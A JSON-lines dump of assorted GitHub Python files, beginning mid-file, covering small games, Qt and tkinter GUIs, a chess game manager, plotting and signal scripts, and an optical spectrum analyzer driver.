windowLayout.setContentsMargins(paddings, paddings, paddings, paddings)\r\n windowLayout.setAlignment(Qt.AlignmentFlag.AlignCenter)\r\n windowWidget.setLayout(windowLayout)\r\n self.setCentralWidget(windowWidget)\r\n\r\n panelLayout = QGridLayout()\r\n panelLayout.setContentsMargins(1, 0, 1, 0)\r\n self.fieldWidget = QLabel()\r\n self.fieldWidget.setScaledContents(True)\r\n self.fieldWidget.setMinimumSize(self.__surface_width__, self.__surface_height__)\r\n\r\n self.minesWidget = LCDCounter()\r\n self.restartWidget = RestartButton()\r\n self.restartWidget.clicked.connect(self.restart)\r\n self.timerWidget = LCDCounter()\r\n\r\n spliter = QSpacerItem(40, 20, QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Minimum)\r\n panelLayout.addWidget(self.minesWidget, 0, 0)\r\n panelLayout.addItem(spliter, 0, 1)\r\n panelLayout.addWidget(self.restartWidget, 0, 3)\r\n panelLayout.addItem(spliter, 0, 4)\r\n panelLayout.addWidget(self.timerWidget, 0, 5)\r\n\r\n windowLayout.addLayout(panelLayout)\r\n windowLayout.addWidget(self.fieldWidget)\r\n\r\n def convert_coordinates(self, x, y) -> tuple:\r\n offset = int(int(config['DEFAULT']['cell_size'])/5)\r\n y_offset = panel_size + paddings * 3 + offset\r\n if (paddings < x < self.width() - paddings) and \\\r\n (y_offset < y < self.height() - paddings - 1):\r\n x -= paddings\r\n y -= y_offset\r\n return x, y\r\n return None, None\r\n\r\n def mousePressEvent(self, click: QMouseEvent) -> None:\r\n if click.button() in (Qt.MouseButton.LeftButton, Qt.MouseButton.RightButton):\r\n x, y = self.convert_coordinates(click.pos().x(), click.pos().y())\r\n if x is None or y is None:\r\n return\r\n if click.button() is Qt.MouseButton.LeftButton:\r\n self.__mouse_event__ = (x, y, 'l')\r\n else:\r\n self.__mouse_event__ = (x, y, 'r')\r\n\r\n def mouseDoubleClickEvent(self, click: QMouseEvent) -> None:\r\n if click.button() is Qt.MouseButton.RightButton:\r\n x, y = self.convert_coordinates(click.pos().x(), click.pos().y())\r\n if x is None or y is None:\r\n return\r\n self.__mouse_event__ = (x, y, '?')\r\n\r\n def restart(self):\r\n self.__need_to_restart__ = True\r\n self.timerWidget.clear()\r\n self.__surface_width__ = int(config['DEFAULT']['cell_size']) * self.__difficulty__.columns\r\n self.__surface_height__ = int(config['DEFAULT']['cell_size']) * self.__difficulty__.rows\r\n self.setFixedSize(self.__surface_width__ + paddings * 2,\r\n self.__surface_height__ + panel_size + paddings * 2.8 + self.menubar.height())\r\n\r\n def closeEvent(self, close: QCloseEvent) -> None:\r\n sys.exit()\r\n# ----------------------------------------------------------------------------------------------------------------------","repo_name":"kopytlyanka/FEFU-Summer-practice-2022","sub_path":"2 неделя/minesweeperV4/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":11231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39971668927","text":"import pygame, sys, Obstacles\r\nfrom player import player\r\nfrom Alien import alien, extra\r\nfrom random import choice, randint\r\nfrom laser import laser\r\n\r\nclass game:\r\n def __init__(self):\r\n #player's setup\r\n player_sprite = player((screen_width / 2 , screen_height), screen_width , 5)\r\n self.player = pygame.sprite.GroupSingle(player_sprite)\r\n\r\n #obstacles' setup\r\n self.shape = Obstacles.shape\r\n self.block_size = 5\r\n self.blocks = pygame.sprite.Group()\r\n self.obstacle_amount = 4\r\n self.obstacle_x_position = [num * (screen_width / 
self.obstacle_amount) for num in range(self.obstacle_amount)]\r\n self.create_multiple_obstacles(*self.obstacle_x_position, x_start = screen_width / 15, y_start = 480)\r\n\r\n #alien's setup\r\n self.aliens = pygame.sprite.Group()\r\n self.alien_lasers = pygame.sprite.Group()\r\n self.alien_setup(rows = 6, cols = 8)\r\n self.alien_direction = 1\r\n\r\n #Extra's setup\r\n self.extra = pygame.sprite.GroupSingle()\r\n self.extra_spawn_time = randint(40, 80)\r\n\r\n #Health & score setup\r\n self.lives = 3\r\n self.live_surf = pygame.image.load('Graphics/player.png').convert_alpha()\r\n self.live_x_start_pos = screen_width - (self.live_surf.get_size()[0] * 2 + 20)\r\n self.score = 0\r\n self.font = pygame.font.Font('Graphics/prstart.ttf', 20)\r\n\r\n # Audio's setup\r\n\r\n music = pygame.mixer.Sound('Graphics/2019-12-11_-_Retro_Platforming_-_David_Fesliyan.mp3')\r\n music.set_volume(0.6)\r\n music.play(loops = -1)\r\n\r\n self.exS = pygame.mixer.Sound('Graphics/verycoolandopbeatupexplosionsound.wav')\r\n self.exS.set_volume(0.11)\r\n\r\n \r\n self.pl_music = pygame.mixer.Sound('Graphics/veryopandstronglaserbeamthatsoundlikeagun.mp3')\r\n self.pl_music.set_volume(0.55)\r\n \r\n def create_obstacle(self, x_start, y_start, offset_x):\r\n for row_index, row in enumerate(self.shape):\r\n for col_index, col in enumerate(row):\r\n if col == 'x':\r\n x = x_start + col_index * self.block_size + offset_x\r\n y = y_start + row_index * self.block_size\r\n block = Obstacles.Block(self.block_size, (241,79,80), x, y)\r\n self.blocks.add(block)\r\n\r\n def create_multiple_obstacles(self, *offset, x_start, y_start):\r\n for offset_x in offset:\r\n self.create_obstacle(x_start, y_start, offset_x )\r\n\r\n def alien_setup(self, rows, cols, x_distance = 60, y_distance = 48, x_offset = 70, y_offset = 100):\r\n for row_index, row in enumerate(range(rows)):\r\n for col_index, col in enumerate(range(cols)):\r\n x = col_index * x_distance + x_offset\r\n y = row_index * y_distance + y_offset\r\n\r\n if row_index == 0: alien_sprite = alien('yellow',x,y)\r\n\r\n elif 1 <= row_index <= 2: alien_sprite = alien('green', x,y)\r\n\r\n else: alien_sprite = alien('red',x,y)\r\n\r\n self.aliens.add(alien_sprite)\r\n\r\n def alien_position_checker(self):\r\n all_aliens = self.aliens.sprites()\r\n\r\n for alien in all_aliens:\r\n if alien.rect.right >= screen_width:\r\n self.alien_direction = -1\r\n self.alien_move_down(2)\r\n\r\n elif alien.rect.left <= 0:\r\n self.alien_direction = 1\r\n self.alien_move_down(2)\r\n\r\n def alien_move_down(self, distance):\r\n if self.aliens:\r\n for alien in self.aliens.sprites():\r\n alien.rect.y += distance\r\n\r\n def alien_shoot(self):\r\n if self.aliens.sprites():\r\n random_alien = choice(self.aliens.sprites())\r\n laser_sprite = laser(random_alien.rect.center, 6, screen_height)\r\n self.alien_lasers.add(laser_sprite)\r\n self.pl_music.play()\r\n\r\n def extra_alien_timer(self):\r\n self.extra_spawn_time -= 1\r\n\r\n if self.extra_spawn_time <= 0:\r\n self.extra.add(extra(choice(['right', 'left']),screen_width))\r\n self.extra_spawn_time = randint(400, 800)\r\n\r\n def check_collision(self):\r\n\r\n #player's lasers\r\n if self.player.sprite.laser:\r\n for laser in self.player.sprite.laser:\r\n #obstacles' collision\r\n if pygame.sprite.spritecollide(laser, self.blocks, True):\r\n laser.kill()\r\n self.exS.play()\r\n\r\n #aliens' collision\r\n aliens_hit = pygame.sprite.spritecollide(laser, self.aliens, True)\r\n\r\n if aliens_hit:\r\n for alien in aliens_hit:\r\n self.score += 
alien.value\r\n laser.kill()\r\n self.exS.play()\r\n\r\n #extra's collision\r\n if pygame.sprite.spritecollide(laser, self.extra, True):\r\n laser.kill()\r\n self.score += 500\r\n self.exS.play()\r\n\r\n if pygame.sprite.spritecollide(laser, self.alien_lasers, True):\r\n laser.kill()\r\n self.exS.play()\r\n\r\n #aliens' laser\r\n\r\n if self.alien_lasers:\r\n for laser in self.alien_lasers:\r\n\r\n #obstacles' collision\r\n if pygame.sprite.spritecollide(laser, self.blocks, True):\r\n laser.kill()\r\n self.exS.play()\r\n\r\n #player's collision\r\n if pygame.sprite.spritecollide(laser, self.player, False):\r\n laser.kill()\r\n self.lives -= 1\r\n\r\n if self.lives <= 0:\r\n self.exS.play()\r\n pygame.quit()\r\n sys.exit()\r\n\r\n #aliens\r\n\r\n if self.aliens:\r\n for alien in self.aliens:\r\n pygame.sprite.spritecollide(alien, self.blocks, True)\r\n\r\n if pygame.sprite.spritecollide(alien, self.player, False):\r\n pygame.quit()\r\n sys.exit()\r\n\r\n def display_lives(self):\r\n for live in range(self.lives - 1):\r\n\r\n x = self.live_x_start_pos + (live * (self.live_surf.get_size()[0] + 10))\r\n\r\n screen.blit(self.live_surf, (x,8))\r\n\r\n def display_score(self):\r\n score_surf = self.font.render(f'score: {self.score}', False, 'white')\r\n score_rect = score_surf.get_rect(topleft = (0,0))\r\n screen.blit(score_surf, score_rect)\r\n\r\n def victory_screen(self):\r\n if not self.aliens.sprites():\r\n victory_surf = self.font.render('You won!', False, 'white')\r\n victory_rect = victory_surf.get_rect(center = (screen_width / 2, screen_height / 2))\r\n screen.blit(victory_surf, victory_rect)\r\n\r\n def run(self):\r\n\r\n #Update\r\n self.player.update()\r\n self.alien_lasers.update()\r\n self.aliens.update(self.alien_direction)\r\n self.extra.update()\r\n\r\n self.alien_position_checker()\r\n self.extra_alien_timer()\r\n self.check_collision()\r\n\r\n #Player's\r\n self.player.sprite.laser.draw(screen)\r\n self.player.draw(screen)\r\n\r\n #Block's\r\n self.blocks.draw(screen)\r\n\r\n #Alien's\r\n self.aliens.draw(screen)\r\n self.alien_lasers.draw(screen)\r\n self.extra.draw(screen)\r\n\r\n #Score and lives\r\n self.display_lives()\r\n self.display_score()\r\n self.victory_screen()\r\n\r\nclass CRT(game):\r\n def __init__(self):\r\n self.tv = pygame.image.load('Graphics/tv.png').convert_alpha()\r\n self.tv = pygame.transform.scale(self.tv, (screen_width, screen_height))\r\n\r\n def create_crt_lines(self):\r\n line_height = 3\r\n line_amount = int(screen_height / line_height)\r\n\r\n for line in range(line_amount):\r\n y_pos = line * line_height\r\n pygame.draw.line(self.tv, 'black', (0, y_pos), (screen_width, y_pos), 1)\r\n\r\n def draw(self):\r\n self.tv.set_alpha(randint(75, 90))\r\n self.create_crt_lines()\r\n screen.blit(self.tv,(0,0))\r\n\r\nif __name__ == '__main__':\r\n pygame.init()\r\n\r\n screen_width = 600\r\n screen_height = 600\r\n\r\n screen = pygame.display.set_mode((screen_width, screen_height))\r\n clock = pygame.time.Clock()\r\n caption = pygame.display.set_caption('Space Invader')\r\n icon = pygame.image.load('Graphics/SI_icon.ico')\r\n setIcon = pygame.display.set_icon(icon)\r\n\r\n game = game()\r\n crt = CRT()\r\n\r\n alienlaser = pygame.USEREVENT + 1\r\n pygame.time.set_timer(alienlaser, 800)\r\n\r\n while True:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n if event.type == alienlaser:\r\n game.alien_shoot()\r\n\r\n screen.fill((30,30,30))\r\n\r\n game.run()\r\n crt.draw()\r\n\r\n 
pygame.display.flip()\r\n\r\n clock.tick(60)","repo_name":"LoafDev/Space-Invader","sub_path":"SI.py","file_name":"SI.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8740316917","text":"import sys\nimport os\nfrom PySide2.QtCore import *\nfrom PySide2.QtGui import *\nfrom PySide2.QtWidgets import *\n\nclass listWidgetClass(QListWidget):\n def __init__(self):\n super(listWidgetClass, self).__init__()\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.setDragDropMode(QAbstractItemView.DropOnly)\n\n def dropEvent(self, event):\n print('DROP', type(event)) # type event est' QDropEvent i samoe glavnoe shto on delaet on vozvrachaet mimedata\n mimedata = event.mimeData()\n print(mimedata)\n if mimedata.hasUrls():\n print(mimedata.urls())\n\n def dragEnterEvent(self, event):\n event.accept()\n # print 'ENTER', type(event)\n\n def dragMoveEvent(self, event):\n # print 'MOVE', type(event)\n pass\n\nif __name__ == '__main__':\n app = QApplication([])\n w = listWidgetClass()\n w.show()\n app.exec_()","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/Advanced_Python_Scripting/012_Drag&Drop/dnd_widget2.py","file_name":"dnd_widget2.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"41834566648","text":"'''\nthis class handles actions a player can do \n'''\nfrom enum import Enum\nfrom functools import partial\nfrom display import Display\nfrom game_state import game_state\nfrom pieces import Piece\nfrom curses import *\nfrom curses.textpad import Textbox\n\ndisplay = Display()\n \nclass Action(Enum):\n MOVE = 'move',\n VALID_MOVES = 'valid_moves'\n\nclass GameManager:\n '''\n class to handle game state\n ''' \n def handle_action(self, action: Action):\n '''\n handles action sets players turn \n\n '''\n if action: \n self.modify_state(action)\n\n game_state.its_whites_turn = not game_state.its_whites_turn if action[0] is Action.MOVE else game_state.its_whites_turn\n game_state.current_party = game_state.white_party if game_state.its_whites_turn else game_state.red_party\n \n\n def handle_move(self, piece, destination): \n attacked_piece = self.check_if_empty(destination, party=game_state.get_non_current_party(), return_piece=True)\n game_state.current_party.move(piece, destination)\n if type(attacked_piece) != bool: \n game_state.get_non_current_party().pieces.remove(attacked_piece)\n game_state.apply()\n \n\n def modify_state(self, action: Action):\n '''\n gets validated acion as input and modifies, applies game state\n '''\n {\n Action.MOVE: partial(self.handle_move, action[1], action[2]),\n Action.VALID_MOVES: partial(self.request_valid_moves, action[2])\n }.get(action[0], False)()\n game_state.apply() \n\n \n def request_valid_moves(self, valid_moves: list): \n '''\n sets request in the game state to tell the display to draw the valid moves \n '''\n game_state.requests['valid_moves']['requested'] = True\n game_state.requests['valid_moves']['value'] = valid_moves\n\n\n def request_action(self): \n editwin = newwin(1, 15, 20, 0)\n # stdscr.addstr('\\n')\n box = Textbox(editwin)\n noecho()\n \n actioned = False\n while not actioned: \n box.edit()\n _input = box.gather()\n # _input = getstr('white: ') if game_state.its_whites_turn else input('red: ')\n action = self.validate_input(_input)\n actioned = True if action else False\n return action\n \n\n def 
validate_input(self, input: str): \n '''\n filters commands and turns them into actions \n commands: \n 1. position, !valid moves: position defines a piece, !valid moves command shows what moves the defined piece can take,\n 2. position, destination: position defines a piece, destination defines where the player wants to move the defined piece \n ''' \n position = input.split()[0]\n command = ' '.join(word for word in input.split()[1:])\n\n # selected piece\n position_x = int(position[0]) \n position_y = game_state.current_party.get_position(position[1])\n position = (position_x - 1, position_y - 1) if position_y else False\n\n # 1st command\n if command == '!valid moves':\n piece = game_state.current_party.find_piece(position)\n valid_positions = self.get_valid_positions(piece, position) \n return (Action.VALID_MOVES, piece, valid_positions) if piece else False \n \n # 2nd command\n destination_x = int(command[0])\n destination_y = game_state.current_party.get_position(command[1])\n destination = (destination_x - 1, destination_y - 1) if destination_y else False\n\n if not position_y or not destination_y: \n return False\n\n piece = game_state.current_party.find_piece(position)\n if not piece: \n return False\n\n valid_positions = self.get_valid_positions(piece, position) \n print(destination)\n return (Action.MOVE, piece, destination) if destination in valid_positions else False \n\n \n def get_valid_positions(self, piece: Piece, position: tuple): \n '''\n returns all valid moves the piece can do from that position\n '''\n valid_positions = piece.get_valid_moves(self.check_if_empty)\n return self.filter_empty_positions(valid_positions)\n \n\n def filter_empty_positions(self, positions: list):\n '''\n gets possible positions a piece can move to and checks if they are empty\n '''\n empty_positions = []\n for position in positions:\n empty = True \n for piece in game_state.current_party.pieces:\n if position == piece.position:\n empty = False\n if empty: \n empty_positions.append(position)\n return empty_positions\n \n\n def check_if_empty(self, position: tuple, party: int, return_piece=False):\n '''\n used in piece objects if they need a special check if a position is empty \n '''\n party = game_state.red_party if party is 1 else game_state.white_party\n for piece in party.pieces:\n if piece.position == position:\n return False if not return_piece else piece\n return True\n \n","repo_name":"micr0tubule/console-chess","sub_path":"game_manager.py","file_name":"game_manager.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19649558296","text":"\nx = input('Enter a file name:')\n\ntry:\n\thandle = open(x)\nexcept:\n\tprint('File', x, 'cannot be accessed') \n\texit()\n\nwordsd = dict()\nfor line in handle:\n\tline = line.lower()\n\tfor l in line:\n\t\tif l not in 'abcdefghijklmnopqrstuvwxyz': continue\n\t\tif l not in wordsd:\n\t\t\twordsd[l] = 1\n\t\telse:\n\t\t\twordsd[l] += 1\n\nsortlist = list()\nfor key, valu in wordsd.items():\n\tsortlist.append( (valu, key) )\nsortlist.sort(reverse = True)\n\nfor key, valu in sortlist :\n\t\tprint(key, valu)\n\n","repo_name":"rtotheroh/class-work","sub_path":"10.3.py","file_name":"10.3.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21684798851","text":"import tkinter as tk\nfrom sqlclass import sqlting\nfrom athleat import athlete\nimport event 
as event\n\nclass startlstclass:\n\n def startlst_layout(startwindow, eventobj):\n sqlclassobj = sqlting()\n sqlclassobj.connect()\n sqlclassobj.createdictcursor()\n query = \"SELECT AthleatName, Lastname, TeamName, RegistrationTime FROM ATHLEATS INNER JOIN EVENT ON ATHLEATS.EventID = EVENT.ID AND EVENT.CompetitionID = %s AND ATHLEATS.EventID = %s ORDER BY RegistrationTime ASC\"\n values = (eventobj.competitionid, eventobj.id)\n #print(values)\n try:\n sqlclassobj.mycursor.execute(query, values)\n startlst = sqlclassobj.mycursor.fetchall()\n except:\n print(\"Error: Could not fetch data\")\n sqlclassobj.close()\n\n addeventbutton = tk.Button(startwindow, text=\"Add athleat\", command= lambda: startlstclass.addathleatbutton_click(startwindow, eventobj))\n addeventbutton.grid(row=0, column=0)\n\n i = 1\n for x in startlst:\n y = 0\n if i==1:\n for k in x.keys():\n e = tk.Label(startwindow, width=20, text = k, relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=y)\n y += 1\n i += 1\n y = 0\n for key, value in x.items():\n e = tk.Label(startwindow, width=20, fg='blue', text = x[key], relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=y)\n y += 1\n i += 1\n\n def startlstbutton_clicked(progwind, eventobj):\n \n startwindow = tk.Toplevel(progwind)\n startwindow.title(\"Start list\")\n\n startlstclass.startlst_layout(startwindow, eventobj)\n \n startwindow.mainloop()\n\n def heatlstbutton_clicked(progwind, eventobj):\n sqlclassobj = sqlting()\n sqlclassobj.connect()\n sqlclassobj.createdictcursor()\n\n myquery = \"CALL Generate_Heatlist(%s, %s);\"\n myvalues = (eventobj.competitionid, eventobj.id)\n sqlclassobj.mycursor.execute(myquery, myvalues)\n \n query = \"SELECT AthleatName, Lastname, TeamName, Heat, Lane, RegistrationTime FROM ATHLEATS INNER JOIN EVENT ON ATHLEATS.EventID = EVENT.ID AND EVENT.CompetitionID = %s AND ATHLEATS.EventID = %s ORDER BY Heat, Lane ASC\"\n values = (eventobj.competitionid, eventobj.id)\n\n sqlclassobj.mycursor.execute(query, values)\n startlst = sqlclassobj.mycursor.fetchall()\n sqlclassobj.close()\n\n heatwindow = tk.Toplevel(progwind)\n heatwindow.title(\"Heat list\") \n\n i = 1\n for x in startlst:\n y = 0\n if i==1:\n for k in x.keys():\n e = tk.Label(heatwindow, width=20, text = k, relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=y)\n y += 1\n i += 1\n y = 0\n for key, value in x.items():\n e = tk.Label(heatwindow, width=20, fg='blue', text = x[key], relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=y)\n y += 1\n i += 1\n heatwindow.mainloop()\n\n def choosefilebutton_clicked(mylst): #fix this in the future\n #open file dialog (utforskaren) and choose file\n print(\"Choose file button was clicked!\")\n\n def saveathleatbutton_clicked(mylst): #fix this in the future by doing the same thing as in guiclass\n athobj = athlete(name=mylst[0].get(), lastname=mylst[1].get(), teamname=mylst[2].get(), gender=mylst[3].get(), age=mylst[4].get(), registrationtime=mylst[5].get())\n athobj.save() #uncomment this when change is wanted in database\n print(\"Save button was clicked!\")\n\n def savefromfilebutton_clicked(mylst): #fix this in the future\n print(\"Save from file button was clicked!\")\n\n def on_close_addathleat(wind, athleatwind, eventobj):\n startlstclass.startlst_layout(wind, eventobj)\n wind.update()\n athleatwind.destroy()\n\n def addathleatbutton_click(progwind, eventobj):\n mytup = (\"Name\", \"Last Name\", \"Team\", \"Gender\", \"Age\", \"Registration Time\")\n mylst = []\n athleatwind = tk.Toplevel(progwind)\n athleatwind.title(\"Add 
Athleat\")\n\n automaticadd = tk.Label(athleatwind, width=20, text = \"Automatic add athleats\", relief=\"ridge\", anchor=\"w\")\n automaticadd.grid(row=0, column=0)\n\n choosefilebutton = tk.Button(athleatwind, text=\"Choose file\", command= lambda: startlstclass.choosefilebutton_clicked(mylst))\n choosefilebutton.grid(row=1, column=0)\n\n myfilentry = tk.Entry(athleatwind, bd = 5, width=50)\n myfilentry.grid(row=1, column=1)\n\n savebutton = tk.Button(athleatwind, text=\"Save\", command= lambda: startlstclass.savefromfilebutton_clicked(mylst))\n savebutton.grid(row=2, column=1)\n\n automaticadd = tk.Label(athleatwind, width=20, text = \"Add athleats manually\", relief=\"ridge\", anchor=\"w\")\n automaticadd.grid(row=4, column=0)\n \n i=5\n for x in mytup:\n e = tk.Label(athleatwind, width=20, text = x, relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=0)\n myentry = tk.Entry(athleatwind, bd = 5)\n myentry.grid(row=i, column=1)\n mylst.append(myentry)\n i += 1\n \n saveathleatbutton = tk.Button(athleatwind, text=\"Save\", command= lambda: startlstclass.saveathleatbutton_clicked(mylst))\n saveathleatbutton.grid(row=i, column=1)\n athleatwind.protocol(\"WM_DELETE_WINDOW\", lambda: startlstclass.on_close_addathleat(progwind, athleatwind, eventobj))\n athleatwind.mainloop()\n #print(\"Add athleat to event!\")\n\n #def editloop_returnrow(mywind, myobj, mylst, mytup, startrow):\n \n # return startrow","repo_name":"Bluefoux/DB_assignment","sub_path":"startlstgui.py","file_name":"startlstgui.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1055191446","text":"import seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\npath = 'results_12_05_11_25.csv'\n\nutil_weight = 1\ntime_weight = 1\n\ndata = pd.read_csv(path)\n\ndata['Generation'] = (data['Generation'] + 1) * 5\n\nsns.set_style('whitegrid')\nsns.set(font_scale=1.2)\nplt.figure(figsize=(30, 30))\n\nfor col in ['Max Score', 'Mean Score', 'Min Score', 'Standard Deviation', 'Max Util', 'Min Time', 'Mean Util', 'Mean Time']:\n filename = f'Util{util_weight}_Weight{time_weight}_{col}.png'\n plot_path = os.path.join('..', 'plots', filename)\n g = sns.relplot(x=\"Generation\", y=col, kind=\"line\", data=data)\n g.savefig(plot_path)","repo_name":"joy-kitson/bus-routes","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70417878246","text":"''''\nPurpose : 在免授权场景下,探讨多个旋转算子对应子星座图的\nData : 2019/5/26\n备注:user_number = 6,旋转因子小于等于pi/7时,子星座图无重合\n'''\n\nimport numpy as np\nfrom math import*\nimport matplotlib.pyplot as plt\n\nJJ = 1j\n\n\ndef seq_buff():\n\n RF = pi/7\n seq_mat = np.zeros(6, dtype=complex)\n for i in range(len(seq_mat)):\n seq_mat[i] = cos(RF * i) + JJ * sin(RF * i)\n return seq_mat\n\n\ndef generate_standard(): # 每个Eb/N0的基础重复数量\n\n seq_mat = seq_buff()\n\n data_length = 1\n user_number = 6\n image_matrix = np.zeros(1, dtype=complex)\n label_matrix = np.zeros(user_number, dtype=complex)\n\n for i in range(2 ** user_number):\n # i = 2**length-i-1\n # 将值为0~2**length的十进制数转为二进制,之后去掉‘0b’的开头,并将二进制转为列表,此时列表内为字符\n j = list(bin(i).split('b')[1])\n # 将不满长度的列表部分补0`\n add = list(np.zeros([user_number - len(j)], dtype=int))\n add.extend(j)\n # 选择向量:将列表转为数组并将数据类型转为int,至此生成选择向量,0表示该沉默用户,1代表活跃用户\n j = np.array(add).astype(np.int)\n\n # 
superimpose the pilot sequences selected by the selection vector, i.e. the signals the receiver may observe; 2**length combinations in total\n        pilots = np.zeros(data_length)\n        for jj in range(user_number):\n            pilots = pilots + seq_mat[jj] * j[jj]\n\n        image_matrix = np.row_stack((image_matrix, pilots))\n        label_matrix = np.row_stack((label_matrix, j))\n\n    return image_matrix[1:2**user_number+1], label_matrix[1:2**user_number+1]\n\n# check whether any user combinations produce duplicate data\ndef validation():\n    image,label = generate_standard()\n    print(image.shape)\n    print(label.shape)\n    count = 0\n\n    for i in range(len(image)-1):\n        for j in range(len(image)-1-i):\n            if ((np.round(image[i].real, 2) == np.round(image[i+j+1].real, 2))\n                &(np.round(image[i].imag, 2) ==np.round(image[i+j+1].imag,2))):\n                count = count + 1\n    print(count)\n\n\nif __name__=='__main__':\n\n    validation()\n    image , label= generate_standard()\n    plt.scatter(image.real, image.imag)\n    plt.show()\n\n","repo_name":"Irwng/Random-Access-ANN","sub_path":"normal/subconstell_grantfree.py","file_name":"subconstell_grantfree.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"30809830210","text":"import time\r\n\r\nimport numpy as np\r\n\r\nfrom LabExT.Instruments.InstrumentAPI import Instrument, InstrumentException\r\n\r\n\r\nclass OpticalSpectrumAnalyzerAQ6370C(Instrument):\r\n    \"\"\"\r\n    ## OpticalSpectrumAnalyzerAQ6370C\r\n\r\n    This class provides an interface to a Yokogawa AQ6370C optical spectrum analyzer. See the following two links for\r\n    the user and programmer guides:\r\n\r\n    * [User Manual](https://cdn.tmi.yokogawa.com/IMAQ6370C-01EN.pdf)\r\n    * [Programmer / Remote Control Manual](https://cdn.tmi.yokogawa.com/1/6057/files/IMAQ6370C-17EN.pdf)\r\n\r\n    #### Properties\r\n\r\n    handbook page refers to: Yokogawa AQ6370C Remote Control Manual (IMAQ6370C-17EN.pdf)\r\n\r\n    | property type    | datatype | read/write | page in handbook | unit | description                                                       |\r\n    |------------------|----------|------------|------------------|------|-------------------------------------------------------------------|\r\n    | startwavelength  | float    | rw         | 7-88             | nm   | Sets/queries the measurement start wavelength.                    |\r\n    | stopwavelength   | float    | rw         | 7-88             | nm   | Sets/queries the measurement stop wavelength.                     |\r\n    | centerwavelength | float    | rw         | 7-87             | nm   | Sets/queries the measurement center wavelength.                   |\r\n    | span             | float    | rw         | 7-87             | nm   | Sets/queries the measurement span.                                |\r\n    | sweepresolution  | float    | rw         | 7-85             | nm   | Sets/queries the measurement resolution (between 0.02nm and 2nm). |\r\n    | n_points         | int      | rw         | 7-86             |      | Sets/queries the number of samples measured per sweep.            |\r\n    | sens_mode        | str      | r          | 7-85             |      | Queries the sensitivity setting of the OSA, see below.            
|\n\n The sensitivity modes is any of: 'NHLD', 'NAUT', 'MID', 'HIGH1', 'HIGH2', 'HIGH3', 'NORM'.\n\n #### Methods\n * **run**: triggers a new measurement and waits until the sweep is over\n * **stop**: stops sweeping\n * **get_data**: downloads the wavelength and power data of the last measurement\n\n \"\"\"\n\n ignored_SCPI_error_numbers = [0, 2]\n\n def __init__(self, *args, **kwargs):\n # call Instrument constructor, creates VISA instrument\n super().__init__(*args, **kwargs)\n\n self.sens_modes = ['NHLD', 'NAUT', 'MID', 'HIGH1', 'HIGH2', 'HIGH3', 'NORM']\n self._sweep_modes = ['SING', 'REP', 'AUTO', 'SEGM']\n self._traces = ['TRA', 'TRB', 'TRC', 'TRD', 'TRE', 'TRF', 'TRG']\n\n self._net_timeout_ms = kwargs.get(\"net_timeout_ms\", 30000)\n\n self.networked_instrument_properties.extend([\n 'startwavelength',\n 'stopwavelength',\n 'centerwavelength',\n 'sweepresolution',\n 'n_points',\n 'sens_mode',\n '_sweep_mode',\n '_active_trace'\n ])\n\n def open(self):\n \"\"\"\n Open the connection to the instrument. Automatically re-uses any old connection if it is already open.\n\n :return: None\n \"\"\"\n super().open()\n\n self._inst.read_termination = '\\r\\n'\n\n authentication = self._inst.query('open \"anonymous\"')\n ready = self._inst.query(\" \")\n\n if authentication != 'AUTHENTICATE CRAM-MD5.' or ready != 'ready':\n raise InstrumentException('Authentication failed')\n\n #\n # run / stop / get data\n #\n\n def run(self, measurement_type='single'):\n \"\"\"\n Starts a measurement and returns the currently active trace (between 1 and 7)\n Valid Types are: \"singe\" (default), \"auto\", \"repeat\".\n :return: active trace number\n \"\"\"\n self.logger.info('Starting {type} sweep'.format(type=measurement_type))\n\n if measurement_type.lower() == 'single':\n # set sens mode\n # self.command(':SENS:SENS NORM')\n self._sweep_mode = 'SING'\n self.clear()\n self.write(':INIT')\n\n # Wait for sweep to finish\n operation_event = 0\n while not (operation_event & 0b1):\n time.sleep(1)\n operation_event = int(self.query(':STAT:OPER:EVEN?'))\n self.logger.info('Waiting for OSA to finish sweep...')\n\n elif measurement_type.lower() == 'auto':\n raise NotImplementedError('The {type} sweep type is not implemented yet'.format(type=measurement_type))\n elif measurement_type.lower() == 'repeat':\n raise NotImplementedError('The {type} sweep type is not implemented yet'.format(type=measurement_type))\n else:\n raise ValueError('Invalid sweep type given: {type}'.format(type=measurement_type))\n\n self.logger.info('OSA Sweep finished')\n\n trace_text = self._active_trace\n return self._traces.index(trace_text) + 1\n\n def stop(self):\n \"\"\"\n Stops a measurement\n \"\"\"\n self.command(':ABOR')\n\n @property\n def _active_trace(self):\n \"\"\"\n Returns the currently active trace\n :return: string active trace\n \"\"\"\n r = self.request(':TRAC:ACT?')\n return r\n\n @_active_trace.setter\n def _active_trace(self, act_trace):\n \"\"\"\n Sets the active trace, displays it and enables recording to it.\n :param act_trace: string trace\n 